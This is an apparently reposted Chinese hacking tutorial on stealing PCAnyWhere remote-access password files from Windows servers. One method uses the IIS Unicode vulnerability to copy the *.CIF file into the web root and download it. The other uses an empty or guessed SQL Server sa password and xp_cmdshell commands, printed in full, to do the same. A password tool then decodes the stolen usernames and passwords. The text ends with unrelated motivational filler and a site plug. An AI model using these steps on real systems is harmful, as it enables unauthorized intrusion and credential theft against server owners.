PCAnyWhere服务端使用5631端口,可以使用:
Telnet 10.10.10.10 5631
确定远程主机的PCAnyWhere服务端是否开启动。
下面介绍两种方法去得到PCAnyWhere的密码文件: 方法一: 使用Unicode漏洞 PCanyWhere密码查看工具
下面将使用Unicode工具演示如何使用Unicode漏洞来得到PCAnyWhere的密码文件(*.CIF)。
步骤如下:
找到主机上的*.CIF文件。
复制该文件到网站目录下。
使用IE下载该文件。
使用PcanywherePWD得到用户名和密码。
连接登陆。
具体步骤:
找到主机上的*.CIF文件 使用dir c:/*.cif /s命令:
一般Citempl.cif为系统默认的密码文件,因此我们需要SA.CIF文件。
复制该文件到网站目录下。 需要知道网站目录,可以通过ida,idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 dir c:/ Tscontent.gif /s
知道目录后,比如为c:/inetpub/wwwroot/
密码文件所在目录:c:/Program Files/pcANYWHERE/DATA
下面执行Copy命令:
复制成功后使用IE下载该文件。再使用PCanyWhere密码查看工具得到用户名和密码
远程连接
方法二: 使用SQLServer PCanyWhere密码查看工具工具
由于有些网站的SQLServer的Sa密码一般为空,或者为Sa,也可能和域名相同,如果远程连接到主机的数据库中,同样可以得到密码文件:
方法如下:
使用: XP_Cmdshell ‘dir c:/*.cif /s’
找到密码文件,然后复制到网站目录下:
XP_Cmdshell ‘copy c:/pcanywhere/sa.cif c:/inetpub/wwwroot’
然后下载,得到用户名和密码。
以上就是高度危险信号 破解管理员的远程密码 。付出才有回报。懂得付出,才能正确看待收获,才能懂得平和自我。付出越多收获才越大。唯有付出,才有收获。天下没有免费的午餐,每个人都要摒弃不劳而获的想法,只有勤奋可以改变命运。更多关于高度危险信号 破解管理员的远程密码 请关注haodaima.com其它相关文章!